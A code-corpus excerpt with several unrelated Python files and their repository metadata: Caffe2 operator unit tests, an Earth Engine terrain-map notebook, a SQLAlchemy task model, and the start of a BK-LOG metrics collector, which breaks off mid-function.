roi_feature = torch.ops._caffe2.RoIAlign(
torch.Tensor(feature).to(device),
torch.Tensor(rois).to(device),
order="NCHW",
spatial_scale=1.0,
pooled_h=3,
pooled_w=3,
sampling_ratio=0,
aligned=False,
)
torch.testing.assert_allclose(roi_feature_ref, roi_feature.cpu())
def test_roi_align_cpu(self):
self._test_roi_align(device="cpu")
@unittest.skipIf(not workspace.has_cuda_support, "No cuda support")
def test_roi_align_cuda(self):
self._test_roi_align(device="cuda")
@given(
N=st.integers(min_value=1, max_value=2),
C=st.integers(min_value=4, max_value=4),
H=st.integers(min_value=10, max_value=10),
W=st.integers(min_value=8, max_value=8),
)
def _test_roi_align_rotated(self, N, C, H, W, device):
def rand_rotated_roi():
return np.array(
[
float(int(N * np.random.rand())),
np.random.rand() * W,
np.random.rand() * H,
np.random.rand() * W,
np.random.rand() * H,
np.random.rand() * 360 - 180
]
).astype(np.float32)
feature = np.random.randn(N, C, H, W).astype(np.float32)
rois = np.array([rand_rotated_roi() for _ in range(10)])
def roi_align_ref(_feature, _rois):
ref_op = core.CreateOperator(
"RoIAlignRotated",
["feature", "rois"],
["roi_feature"],
spatial_scale=1.0,
pooled_h=3,
pooled_w=3,
sampling_ratio=0,
)
workspace.FeedBlob("feature", _feature)
workspace.FeedBlob("rois", _rois)
workspace.RunOperatorOnce(ref_op)
return workspace.FetchBlob("roi_feature")
roi_feature_ref = roi_align_ref(feature, rois)
roi_feature = torch.ops._caffe2.RoIAlignRotated(
torch.Tensor(feature).to(device),
torch.Tensor(rois).to(device),
order="NCHW",
spatial_scale=1.0,
pooled_h=3,
pooled_w=3,
sampling_ratio=0,
aligned=False,
)
torch.testing.assert_allclose(roi_feature_ref, roi_feature.cpu())
def test_roi_align_rotated_cpu(self):
self._test_roi_align_rotated(device="cpu")
@unittest.skipIf(not workspace.has_cuda_support, "No cuda support")
def test_roi_align_rotated_cuda(self):
self._test_roi_align_rotated(device="cuda")
@given(roi_counts=st.lists(st.integers(0, 5), min_size=1, max_size=10))
def test_collect_and_distribute_fpn_rpn_proposals_op(self, roi_counts):
batch_size = len(roi_counts)
im_dims = np.random.randint(100, 600, batch_size)
rpn_rois_and_scores = []
for i in range(5):
rpn_rois_and_scores.append(torch.Tensor(generate_rois(roi_counts, im_dims)))
for i in range(5):
rpn_rois_and_scores.append(torch.rand(sum(roi_counts)))
rois = torch.ops._caffe2.CollectRpnProposals(
rpn_rois_and_scores,
rpn_max_level=6,
rpn_min_level=2,
rpn_post_nms_topN=sum(roi_counts),
)
fpn_outputs = torch.ops._caffe2.DistributeFpnProposals(
rois,
roi_canonical_scale=224,
roi_canonical_level=4,
roi_max_level=5,
roi_min_level=2,
legacy_plus_one=True,
)
all_outputs = torch.ops._caffe2.CollectAndDistributeFpnRpnProposals(
rpn_rois_and_scores,
roi_canonical_scale=224,
roi_canonical_level=4,
roi_max_level=5,
roi_min_level=2,
rpn_max_level=6,
rpn_min_level=2,
rpn_post_nms_topN=sum(roi_counts),
legacy_plus_one=True,
)
rois_fpn_list = fpn_outputs[:-1]
rois_idx_restore_int32 = fpn_outputs[-1]
# [rois] + fpn_outputs should be equal to all_outputs
torch.testing.assert_allclose(rois, all_outputs[0])
for x, y in zip(fpn_outputs, all_outputs[1:]):
torch.testing.assert_allclose(x, y)
@given(X=hu.tensor(),
fast_gelu=st.booleans())
def _test_gelu_op(self, X, fast_gelu, device):
def _gelu_ref(_X):
return (_X * norm.cdf(_X).astype(np.float32), )
expected_output, = _gelu_ref(X)
actual_output = torch.ops._caffe2.Gelu(torch.tensor(X), fast_gelu)
rtol = 1e-3 if fast_gelu else 1e-4
atol = 1e-5
torch.testing.assert_allclose(
expected_output, actual_output.cpu(), rtol=rtol, atol=atol)
def test_gelu_op(self):
self._test_gelu_op(device="cpu")
@unittest.skipIf(not workspace.has_cuda_support, "No cuda support")
def test_gelu_op_cuda(self):
self._test_gelu_op(device="cuda")
@given(inputs=hu.lengths_tensor(
dtype=np.float32,
min_value=1,
max_value=5,
allow_empty=True,
))
def _test_lengths_op(self, inputs, ref_op_name, torch_op, device):
data, lengths = inputs
def _lengths_ref(X, Y):
ref_op = core.CreateOperator(ref_op_name, ["X", "Y"], "out")
workspace.FeedBlob("X", X)
workspace.FeedBlob("Y", Y)
workspace.RunOperatorOnce(ref_op)
return workspace.FetchBlob("out")
expected_output = _lengths_ref(data, lengths)
actual_output = torch_op(
torch.tensor(data), torch.tensor(lengths, dtype=torch.int32))
torch.testing.assert_allclose(expected_output, actual_output.cpu())
def _test_lengths_sum_op(self, device):
self._test_lengths_op("LengthsSum", torch.ops._caffe2.LengthsSum, device)
def test_lengths_sum_op(self):
self._test_lengths_sum_op(device="cpu")
@unittest.skipIf(not workspace.has_cuda_support, "No cuda support")
def test_lengths_sum_op_cuda(self):
self._test_lengths_sum_op(device="cuda")
def _test_lengths_mean_op(self, device):
self._test_lengths_op("LengthsMean", torch.ops._caffe2.LengthsMean, device)
def test_lengths_mean_op(self):
self._test_lengths_mean_op(device="cpu")
@unittest.skipIf(not workspace.has_cuda_support, "No cuda support")
def test_lengths_mean_op_cuda(self):
self._test_lengths_mean_op(device="cuda")
def _test_lengths_max_op(self, device):
self._test_lengths_op("LengthsMax", torch.ops._caffe2.LengthsMax, device)
def test_lengths_max_op(self):
self._test_lengths_max_op(device="cpu")
@unittest.skipIf(not workspace.has_cuda_support, "No cuda support")
def test_lengths_max_op_cuda(self):
self._test_lengths_max_op(device="cuda")
def _test_resize_nearest_op(self, device):
data = np.random.rand(1, 2, 3, 4).astype(np.float32)
def _resize_nearest_ref(X):
ref_op = core.CreateOperator(
"ResizeNearest", ["X"], ["Y"],
width_scale=2.0, height_scale=1.5, order="NCHW",
)
workspace.FeedBlob("X", X)
workspace.RunOperatorOnce(ref_op)
return workspace.FetchBlob("Y")
expected_output = _resize_nearest_ref(data)
actual_output = torch.ops._caffe2.ResizeNearest(
torch.tensor(data).to(device),
order="NCHW", width_scale=2.0, height_scale=1.5,
)
torch.testing.assert_allclose(expected_output, actual_output.cpu())
def test_resize_nearest_op_cpu(self):
return self._test_resize_nearest_op("cpu")
@unittest.skipIf(not workspace.has_cuda_support, "No cuda support")
def test_resize_nearest_op_cuda(self):
return self._test_resize_nearest_op("cuda")
@given(input_data=hu.tensor(min_dim=2, max_dim=2))
def test_Fused8BitRowwiseQuantizedToFloat(self, input_data):
QuantizeOp = core.CreateOperator(
"FloatToFused8BitRowwiseQuantized",
["input_data"],
["quantized_data"],
)
workspace.FeedBlob("input_data", input_data)
workspace.RunOperatorOnce(QuantizeOp)
quantized_data = workspace.FetchBlob("quantized_data")
dequantized_data = torch.ops._caffe2.Fused8BitRowwiseQuantizedToFloat(
torch.tensor(quantized_data)
)
reference = fused_rowwise_8bit_quantize_dequantize_reference(input_data)
np.testing.assert_array_almost_equal(dequantized_data.numpy(), reference)
@given(binary_input=st.booleans())
def test_piecewise_linear_op(self, binary_input):
if binary_input:
num_dims = 1
else:
num_dims = 3
data = np.random.rand(1024, num_dims).astype(np.float32)
slopes = np.zeros(4 * num_dims).astype(np.float32)
bounds = np.sort(np.random.rand(5, num_dims).astype(np.float32), axis=0).flatten('F')
intercepts = np.random.rand(4 * num_dims).astype(np.float32)
def _piecewise_linear_ref(X):
ref_op = core.CreateOperator(
"PiecewiseLinearTransform",
["data",
"bounds",
"slopes",
"intercepts"],
["calibrated"],
binary=binary_input,
)
workspace.FeedBlob("data", X)
workspace.FeedBlob("bounds", bounds)
workspace.FeedBlob("slopes", slopes)
workspace.FeedBlob("intercepts", intercepts)
workspace.RunOperatorOnce(ref_op)
return workspace.FetchBlob("calibrated")
expected_output = _piecewise_linear_ref(data)
actual_output = torch.ops._caffe2.PiecewiseLinearTransform(
torch.tensor(data), bounds.tolist(), slopes.tolist(), intercepts.tolist(), binary_input)
torch.testing.assert_allclose(torch.tensor(expected_output), actual_output)
def test_alias_with_name_is_in_place(self):
device = "cuda" if workspace.has_cuda_support else "cpu"
x = torch.Tensor([3, 42]).to(device)
y = torch.ops._caffe2.AliasWithName(x, "new_name")
x[1] = 6
torch.testing.assert_allclose(x, torch.Tensor([3, 6]).to(device))
# y should also change because y is alias of x
torch.testing.assert_allclose(y, torch.Tensor([3, 6]).to(device))
@unittest.skipIf(not workspace.has_cuda_support, "No cuda support")
def test_copy_between_cpu_and_gpu(self):
x_cpu_ref = torch.Tensor([1, 2, 3])
x_gpu_ref = x_cpu_ref.to("cuda")
x_gpu = torch.ops._caffe2.CopyCPUToGPU(x_cpu_ref)
torch.testing.assert_allclose(x_gpu, x_gpu_ref)
x_cpu = torch.ops._caffe2.CopyGPUToCPU(x_gpu)
torch.testing.assert_allclose(x_cpu, x_cpu_ref)
def test_index_hash_op(self):
data = np.random.randint(low=0, high=1000, size=(4, 4, 4))
def _index_hash_ref(X):
ref_op = core.CreateOperator(
"IndexHash", ["X"], ["Y"], seed=0, modulo=100
)
workspace.FeedBlob("X", X)
workspace.RunOperatorOnce(ref_op)
return workspace.FetchBlob("Y")
expected_output = _index_hash_ref(data)
actual_output = torch.ops._caffe2.IndexHash(
torch.tensor(data), seed=0, modulo=100
)
torch.testing.assert_allclose(expected_output, actual_output.cpu())
def test_bucketize_op(self):
data = np.random.rand(8, 10).astype(np.float32) * 1000
boundaries = np.array([1, 10, 100, 1000, 100000]).astype(np.float32)
def _bucketize_ref(X):
ref_op = core.CreateOperator(
"Bucketize", ["X"], ["Y"], boundaries=boundaries
)
workspace.FeedBlob("X", X)
workspace.RunOperatorOnce(ref_op)
return workspace.FetchBlob("Y")
expected_output = _bucketize_ref(data)
actual_output = torch.ops._caffe2.Bucketize(
torch.tensor(data), boundaries
)
torch.testing.assert_allclose(expected_output, actual_output.cpu())
@given(X=hu.tensor(),
eps=st.floats(min_value=1e-4, max_value=1e-2),
)
def test_logit(self, X, eps):
def ref(X, eps):
ref_op = core.CreateOperator('Logit', ["X"], ["Y"], eps=eps)
workspace.FeedBlob("X", X)
workspace.RunOperatorOnce(ref_op)
return workspace.FetchBlob("Y")
expected_output = ref(X, eps)
actual_output = torch.ops._caffe2.Logit(
torch.tensor(X), eps
)
torch.testing.assert_allclose(expected_output, actual_output.cpu())
def test_percentile(self):
original_values = np.array([[3., 5., 3], [5., 1., 6.]]).astype(np.float32)
value_to_pct = np.array([[3, 0.2], [5, 0.5], [1, 0.3], [3, 0.6]]).astype(np.float32)
lengths = np.array([2, 1, 1]).astype(np.int32)
def _percentile_ref(original_values, value_to_pct, lengths):
ref_op = core.CreateOperator('Percentile', ["original_values", "value_to_pct", "lengths"], ["Y"])
workspace.FeedBlob("original_values", original_values)
workspace.FeedBlob("value_to_pct", value_to_pct)
workspace.FeedBlob("lengths", lengths)
workspace.RunOperatorOnce(ref_op)
return workspace.FetchBlob("Y")
expected_output = _percentile_ref(original_values, value_to_pct, lengths)
actual_output = torch.ops._caffe2.Percentile(
torch.tensor(original_values), torch.Tensor(value_to_pct), torch.Tensor(lengths).int()
)
torch.testing.assert_allclose(expected_output, actual_output.cpu())
def test_batch_bucket_one_hot_op(self):
data = np.array([[2, 3], [4, 1], [2, 5]]).astype(np.float32)
lengths = np.array([2, 3]).astype(np.int32)
boundaries = np.array([0.1, 2.5, 1, 3.1, 4.5]).astype(np.float32)
def _batch_bucket_one_hot_ref(data, lengths, boundaries):
ref_op = core.CreateOperator('BatchBucketOneHot', ["data", "lengths", "boundaries"], ["Y"])
workspace.FeedBlob("data", data)
workspace.FeedBlob("lengths", lengths)
workspace.FeedBlob("boundaries", boundaries)
workspace.RunOperatorOnce(ref_op)
return workspace.FetchBlob("Y")
expected_output = _batch_bucket_one_hot_ref(data, lengths, boundaries)
actual_output = torch.ops._caffe2.BatchBucketOneHot(
torch.tensor(data), torch.Tensor(lengths).int(), torch.Tensor(boundaries)
)
torch.testing.assert_allclose(expected_output, actual_output.cpu())
def test_gather_ranges_to_dense_op(self):
data = np.array([1, 2, 3, 4, 5, 6, 7, 8])
ranges = np.array([[[2, 4]], [[0, 0]]])
key = np.array([0, 1, 3, 2, 1, 0, 1, 0])
lengths = np.array([4])
min_observation = 2
max_mismatched_ratio = 0.5
max_empty_ratio = 1.0
outputs_name = ["X_{}".format(i) for i in range(len(lengths))]
ref_op = core.CreateOperator(
"GatherRangesToDense",
["data", "ranges", "key"],
outputs_name,
lengths=lengths,
min_observation=min_observation,
max_mismatched_ratio=max_mismatched_ratio,
max_empty_ratio=max_empty_ratio,
)
workspace.FeedBlob("data", data)
workspace.FeedBlob("ranges", ranges)
workspace.FeedBlob("key", key)
workspace.RunOperatorOnce(ref_op)
ref_outputs = []
for output_name in outputs_name:
ref_outputs.append(workspace.FetchBlob(output_name))
outputs = torch.ops._caffe2.GatherRangesToDense(
torch.from_numpy(data),
torch.from_numpy(ranges),
torch.from_numpy(key),
lengths=lengths,
min_observation=min_observation,
max_mismatched_ratio=max_mismatched_ratio,
max_empty_ratio=max_empty_ratio,
)
self.assertEqual(len(ref_outputs), len(outputs))
for i in range(0, len(ref_outputs)):
np.testing.assert_array_almost_equal(ref_outputs[i], outputs[i].numpy())
@given(lengths_0=st.integers(1, 10), lengths_1=st.integers(1, 10))
@settings(deadline=1000)
def test_merge_id_lists(self, lengths_0, lengths_1):
def _merge_id_lists(lengths, values):
ref_op = core.CreateOperator(
'MergeIdLists',
["lengths_0", "values_0", "lengths_1", "values_1"],
["merged_lengths", "merged_values"]
)
workspace.FeedBlob("lengths_0", lengths[0])
workspace.FeedBlob("values_0", values[0])
workspace.FeedBlob("lengths_1", lengths[1])
workspace.FeedBlob("values_1", values[1])
workspace.RunOperatorOnce(ref_op)
return workspace.FetchBlob("merged_lengths"), workspace.FetchBlob("merged_values")
lengths = [np.array([lengths_0]).astype(np.int32), np.array([lengths_1]).astype(np.int32)]
values = [
np.random.choice(np.arange(0, 10), size=lengths_0, replace=False).astype(np.int32),
np.random.choice(np.arange(10, 20), size=lengths_1, replace=False).astype(np.int32)
]
expected_merged_lengths, expected_merged_values = _merge_id_lists(lengths, values)
output_merged_lengths, output_merged_values = torch.ops._caffe2.MergeIdLists(
[torch.tensor(lengths[0]), torch.tensor(values[0]), torch.tensor(lengths[1]), torch.tensor(values[1])]
)
torch.testing.assert_allclose(expected_merged_lengths, output_merged_lengths)
torch.testing.assert_allclose(expected_merged_values, output_merged_values)
def test_learning_rate(self):
base_lr = 0.05
no_iter = torch.tensor([0])
one_iter = torch.tensor([1])
two_iter = torch.tensor([2])
# Fixed policy
self.assertEqual(
base_lr,
torch.ops._caffe2.LearningRate(
iterations=no_iter, base_lr=base_lr, policy="fixed"
),
)
self.assertEqual(
base_lr,
torch.ops._caffe2.LearningRate(
iterations=one_iter, base_lr=base_lr, policy="fixed"
),
)
# Step policy
gamma = 0.99
stepsize = 1
self.assertEqual(
base_lr,
torch.ops._caffe2.LearningRate(
iterations=no_iter,
base_lr=base_lr,
policy="step",
stepsize=stepsize,
gamma=gamma,
),
)
self.assertAlmostEqual(
base_lr * (gamma ** (1.0 / stepsize)),
torch.ops._caffe2.LearningRate(
iterations=one_iter,
base_lr=base_lr,
policy="step",
stepsize=stepsize,
gamma=gamma,
),
)
self.assertAlmostEqual(
base_lr * (gamma ** (2.0 / stepsize)),
torch.ops._caffe2.LearningRate(
iterations=two_iter,
base_lr=base_lr,
policy="step",
stepsize=stepsize,
gamma=gamma,
),
)
def test_pack_segments(self):
s = torch.rand(3, 3, 3)
lengths = torch.tensor([2, 1])
packed_tensor, _ = torch.ops._caffe2.PackSegments(
lengths,
s,
)
self.assertEqual(packed_tensor.numpy().shape, (2, 2, 3, 3))
unpacked_tensor = torch.ops._caffe2.UnpackSegments(
lengths,
packed_tensor,
)
torch.testing.assert_allclose(s, unpacked_tensor)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
1c47c9fdf8a8c8a97a85e511d2f728033d298a81 | b4c6200590a093b805036a822b7889c058494b9f | /Datasets/Terrain/us_ned_chili.py | 8d66c58338f961fef2e597316c2d216fac9c958f | [
"MIT"
] | permissive | spoddar-JNPR/earthengine-py-notebooks | 2109a52a49357c19f803b76ed635e022ee486ac6 | ff1b5754785d5e25cb11acdbd52b0f31711d061f | refs/heads/master | 2022-12-25T10:34:44.895717 | 2020-10-01T05:38:16 | 2020-10-01T05:38:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,897 | py | # %%
"""
<table class="ee-notebook-buttons" align="left">
<td><a target="_blank" href="https://github.com/giswqs/earthengine-py-notebooks/tree/master/Datasets/Terrain/us_ned_chili.ipynb"><img width=32px src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" /> View source on GitHub</a></td>
<td><a target="_blank" href="https://nbviewer.jupyter.org/github/giswqs/earthengine-py-notebooks/blob/master/Datasets/Terrain/us_ned_chili.ipynb"><img width=26px src="https://upload.wikimedia.org/wikipedia/commons/thumb/3/38/Jupyter_logo.svg/883px-Jupyter_logo.svg.png" />Notebook Viewer</a></td>
<td><a target="_blank" href="https://colab.research.google.com/github/giswqs/earthengine-py-notebooks/blob/master/Datasets/Terrain/us_ned_chili.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" /> Run in Google Colab</a></td>
</table>
"""
# %%
"""
## Install Earth Engine API and geemap
Install the [Earth Engine Python API](https://developers.google.com/earth-engine/python_install) and [geemap](https://github.com/giswqs/geemap). The **geemap** Python package is built upon the [ipyleaflet](https://github.com/jupyter-widgets/ipyleaflet) and [folium](https://github.com/python-visualization/folium) packages and implements several methods for interacting with Earth Engine data layers, such as `Map.addLayer()`, `Map.setCenter()`, and `Map.centerObject()`.
The following script checks if the geemap package has been installed. If not, it will install geemap, which automatically installs its [dependencies](https://github.com/giswqs/geemap#dependencies), including earthengine-api, folium, and ipyleaflet.
**Important note**: A key difference between folium and ipyleaflet is that ipyleaflet is built upon ipywidgets and allows bidirectional communication between the front-end and the backend enabling the use of the map to capture user input, while folium is meant for displaying static data only ([source](https://blog.jupyter.org/interactive-gis-in-jupyter-with-ipyleaflet-52f9657fa7a)). Note that [Google Colab](https://colab.research.google.com/) currently does not support ipyleaflet ([source](https://github.com/googlecolab/colabtools/issues/60#issuecomment-596225619)). Therefore, if you are using geemap with Google Colab, you should use [`import geemap.eefolium`](https://github.com/giswqs/geemap/blob/master/geemap/eefolium.py). If you are using geemap with [binder](https://mybinder.org/) or a local Jupyter notebook server, you can use [`import geemap`](https://github.com/giswqs/geemap/blob/master/geemap/geemap.py), which provides more functionalities for capturing user input (e.g., mouse-clicking and moving).
"""
# %%
# Installs geemap package
import subprocess
try:
import geemap
except ImportError:
print('geemap package not installed. Installing ...')
subprocess.check_call(["python", '-m', 'pip', 'install', 'geemap'])
# Checks whether this notebook is running on Google Colab
try:
import google.colab
import geemap.eefolium as geemap
except:
import geemap
# Authenticates and initializes Earth Engine
import ee
try:
ee.Initialize()
except Exception as e:
ee.Authenticate()
ee.Initialize()
# %%
"""
## Create an interactive map
The default basemap is `Google Maps`. [Additional basemaps](https://github.com/giswqs/geemap/blob/master/geemap/basemaps.py) can be added using the `Map.add_basemap()` function.
"""
# %%
Map = geemap.Map(center=[40,-100], zoom=4)
Map
# %%
"""
## Add Earth Engine Python script
"""
# %%
# Add Earth Engine dataset
dataset = ee.Image('CSP/ERGo/1_0/US/CHILI')
usChili = dataset.select('constant')
usChiliVis = {
'min': 0.0,
'max': 255.0,
}
Map.setCenter(-105.8636, 40.3439, 11)
Map.addLayer(usChili, usChiliVis, 'US CHILI')
# %%
"""
## Display Earth Engine data layers
"""
# %%
Map.addLayerControl() # This line is not needed for ipyleaflet-based Map.
Map | [
"[email protected]"
] | |
4d9e7f2b00593771459ae1d452b172e575e963f1 | 4a2c9299dfd009a614934ee82910adaa17ff3186 | /app/tasks/models.py | 75bc9c44588e8100eca8370379fc0d70e88d4cfe | [
"MIT"
] | permissive | sampathweb/blueprint_app | be8ab9c5bd956bc393b61542158c325ad27fffed | 149225db4291519a6de56d8930e3a36ff9cd7888 | refs/heads/master | 2016-09-06T08:30:25.918934 | 2013-10-24T22:48:52 | 2013-10-24T22:48:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 332 | py | from datetime import datetime
from app import db
class Task(db.Model):
"""A Task list."""
__tablename__ = 'tasks'
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(50), unique=True, nullable=False)
description = db.Column(db.String(255))
active = db.Column(db.Boolean, default=True)
| [
"[email protected]"
] | |
3228263fc72105b309bff70782b154f4301ebf3d | 457286f32a360c36da04f47fc4e7456dc07ee1df | /apps/log_measure/handlers/metrics.py | d51099943bd9c36c0f3352117243835c1e7264b5 | [
"MIT"
] | permissive | jiazhizhong/bk-log | 2fad422022f02569acf6e8668bb548cb76fcd8ca | 85107762102ba2c72dcfb30fcf8986e146c03889 | refs/heads/master | 2023-08-21T02:01:08.911894 | 2021-10-22T08:52:22 | 2021-10-22T08:52:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 24,051 | py | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-LOG 蓝鲸日志平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-LOG 蓝鲸日志平台 is licensed under the MIT License.
License for BK-LOG 蓝鲸日志平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from __future__ import absolute_import, unicode_literals
import socket
import time
from collections import defaultdict
from functools import wraps
import arrow
from django.contrib.auth import get_user_model
from django.core.cache import cache
from django.db.models import Count
from django.utils.translation import ugettext as _
from elasticsearch import Elasticsearch
from apps.api import TransferApi, NodeApi, CCApi
from apps.utils.log import logger
from apps.log_databus.constants import STORAGE_CLUSTER_TYPE
from apps.log_databus.models import CollectorConfig
from apps.log_measure.exceptions import EsConnectFailException
from apps.log_search.models import UserIndexSetSearchHistory, LogIndexSet, ProjectInfo
from bk_dataview.grafana import client as grafana_client
class Metric(object):
"""
指标定义
"""
def __init__(self, metric_name, metric_value, dimensions=None):
self.metric_name = metric_name
self.metric_value = metric_value
self.dimensions = dimensions
def to_prometheus_text(self, namespace=None, timestamp=""):
if namespace:
actual_metric_name = "{}_{}".format(namespace, self.metric_name)
else:
actual_metric_name = self.metric_name
if self.dimensions:
dimensions = ",".join('{}="{}"'.format(key, value) for key, value in self.dimensions.items())
dimensions = "{" + dimensions + "}"
else:
dimensions = ""
prometheus_text = "{metric_name}{dimensions} {metric_value} {timestamp}".format(
metric_name=actual_metric_name,
dimensions=dimensions,
metric_value=self.metric_value,
timestamp=timestamp * 1000,
)
return prometheus_text
def register_metric(namespace, description="", cache_time=0):
def wrapped_view(func):
def _wrapped_view(*args, **kwargs):
cache_key = f"statistics_{namespace}"
if cache_time:
result = cache.get(cache_key)
if result:
return result
result = func(*args, **kwargs)
if cache_time:
cache.set(cache_key, result, cache_time)
return result
_wrapped_view.namespace = namespace
_wrapped_view.description = description
_wrapped_view.is_metric = True
return wraps(func)(_wrapped_view)
return wrapped_view
class BaseMetricCollector(object):
def __init__(self, collect_interval=300):
# 业务缓存
biz_list = CCApi.get_app_list({"fields": ["bk_biz_id", "bk_biz_name"], "no_request": True}).get("info", [])
self.biz_info = {int(business["bk_biz_id"]): business for business in biz_list}
self.project_biz_info = {}
for project in ProjectInfo.objects.all():
self.project_biz_info[project.project_id] = self.biz_info.get(project.bk_biz_id)
# 上报时间
self.collect_interval = collect_interval
timestamp = arrow.now().timestamp
self.report_ts = timestamp // self.collect_interval * self.collect_interval
@property
def time_range(self):
# 取整
return arrow.get(self.report_ts - self.collect_interval).datetime, arrow.get(self.report_ts).datetime
def get_biz_name(self, bk_biz_id):
"""
根据业务ID获取业务名称
"""
return self.biz_info[int(bk_biz_id)]["bk_biz_name"] if int(bk_biz_id) in self.biz_info else bk_biz_id
def collect(self, namespaces=None, response_format="prometheus"):
"""
采集入口
"""
metric_methods = self.list_metric_methods(namespaces)
metric_groups = []
for metric_method in metric_methods:
try:
begin_time = time.time()
metric_groups.append(
{
"namespace": metric_method.namespace,
"description": metric_method.description,
"metrics": metric_method(),
}
)
logger.info(
"[statistics_data] collect metric->[{}] took {} ms".format(
metric_method.namespace, int((time.time() - begin_time) * 1000)
),
)
except Exception as e: # pylint: disable=broad-except
logger.exception("[statistics_data] collect metric->[{}] failed: {}".format(metric_method.namespace, e))
if response_format != "prometheus":
return metric_groups
metric_text_list = []
# 转换为prometheus格式
for group in metric_groups:
metric_text_list.append("# {}".format(group["description"] or group["namespace"]))
for metric in group["metrics"]:
metric_text_list.append(
metric.to_prometheus_text(namespace=group["namespace"], timestamp=self.report_ts)
)
return "\n".join(metric_text_list)
@property
def registered_metrics(self):
return [
method
for method in dir(self)
if method != "registered_metrics"
and callable(getattr(self, method))
and getattr(getattr(self, method), "is_metric", None)
]
def list_metric_methods(self, namespaces=None):
"""
获取
:param namespaces:
:return:
"""
namespaces = namespaces or []
if isinstance(namespaces, str):
namespaces = [namespaces]
methods = []
for metric in self.registered_metrics:
method = getattr(self, metric)
if not namespaces:
methods.append(method)
for namespace in namespaces:
if method.namespace.startswith(namespace):
methods.append(method)
return methods
@classmethod
def append_total_metric(cls, metrics):
total = sum(metric.metric_value for metric in metrics)
metrics.append(
Metric(
metric_name="total",
metric_value=total,
)
)
return metrics
class MetricCollector(BaseMetricCollector):
def __init__(self, *args, **kwargs):
super(MetricCollector, self).__init__(*args, **kwargs)
self.cluster_infos = {
cluster_info["cluster_config"]["cluster_id"]: cluster_info for cluster_info in self.list_cluster_info()
}
self._cluster_clients = {}
@staticmethod
def list_cluster_info(cluster_id=None):
"""
获取集群列表
"""
params = {"cluster_type": STORAGE_CLUSTER_TYPE, "no_request": True}
if cluster_id:
params.update({"cluster_id": cluster_id})
return TransferApi.get_cluster_info(params)
def get_es_client_by_id(self, cluster_id):
"""
根据集群ID获取ES客户端
"""
cluster_info = self.cluster_infos.get(cluster_id)
if not cluster_info:
return None
return self.get_es_client(cluster_info)
def get_es_client(self, cluster_info):
"""
根据集群信息获取ES客户端
"""
cluster_id = cluster_info["cluster_config"]["cluster_id"]
if cluster_id in self._cluster_clients:
return self._cluster_clients[cluster_id]
self._cluster_clients[cluster_id] = None
cluster_config = cluster_info["cluster_config"]
domain_name = cluster_config["domain_name"]
port = cluster_config["port"]
auth_info = cluster_info.get("auth_info", {})
username = auth_info.get("username")
password = auth_info.get("password")
cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
es_address: tuple = (str(domain_name), int(port))
cs.settimeout(2)
status: int = cs.connect_ex(es_address)
if status != 0:
raise EsConnectFailException()
cs.close()
http_auth = (username, password) if username and password else None
es_client = Elasticsearch(
hosts=[domain_name],
http_auth=http_auth,
scheme="http",
port=port,
verify_certs=True,
timeout=10,
)
if not es_client.ping(params={"request_timeout": 10}):
raise EsConnectFailException()
self._cluster_clients[cluster_id] = es_client
return es_client
@register_metric("business_active", _("活跃业务"))
def business_active(self):
# 一个星期内检索过日志的,才被认为是活跃业务
history_ids = UserIndexSetSearchHistory.objects.filter(
created_at__gte=arrow.now().replace(days=-7).datetime
).values_list("index_set_id", flat=True)
project_ids = set(
LogIndexSet.objects.filter(index_set_id__in=set(history_ids)).values_list("project_id", flat=True)
)
metrics = [
Metric(
metric_name="count",
metric_value=1,
dimensions={
"target_biz_id": self.project_biz_info[project_id]["bk_biz_id"],
"target_biz_name": self.project_biz_info[project_id]["bk_biz_name"],
},
)
for project_id in project_ids
if self.project_biz_info.get(project_id)
]
metrics = self.append_total_metric(metrics)
return metrics
@register_metric("user_active", _("活跃用户"))
def user_active(self):
user_model = get_user_model()
recent_login_users = user_model.objects.filter(last_login__gte=self.time_range[0])
metrics = [
Metric(metric_name="count", metric_value=1, dimensions={"username": user.username})
for user in recent_login_users
]
metrics = self.append_total_metric(metrics)
return metrics
@register_metric("collector_config", _("采集配置"))
def collector_config(self):
groups = (
CollectorConfig.objects.filter(is_active=True)
.values("bk_biz_id")
.order_by()
.annotate(count=Count("collector_config_id"))
)
metrics = [
Metric(
metric_name="count",
metric_value=group["count"],
dimensions={
"target_biz_id": group["bk_biz_id"],
"target_biz_name": self.get_biz_name(group["bk_biz_id"]),
},
)
for group in groups
]
metrics = self.append_total_metric(metrics)
return metrics
@register_metric("collector_host", _("采集主机"), cache_time=60 * 60)
def collect_host(self):
configs = CollectorConfig.objects.filter(is_active=True).values(
"bk_biz_id", "subscription_id", "category_id", "collector_config_id"
)
biz_mapping = {
config["subscription_id"]: {
"bk_biz_id": config["bk_biz_id"],
"category_id": config["category_id"],
"collector_config_id": config["collector_config_id"],
}
for config in configs
if config["subscription_id"]
}
groups = NodeApi.get_subscription_instance_status(
{"subscription_id_list": list(biz_mapping.keys()), "no_request": True}
)
metrics = [
Metric(
metric_name="count",
metric_value=len(group["instances"]),
dimensions={
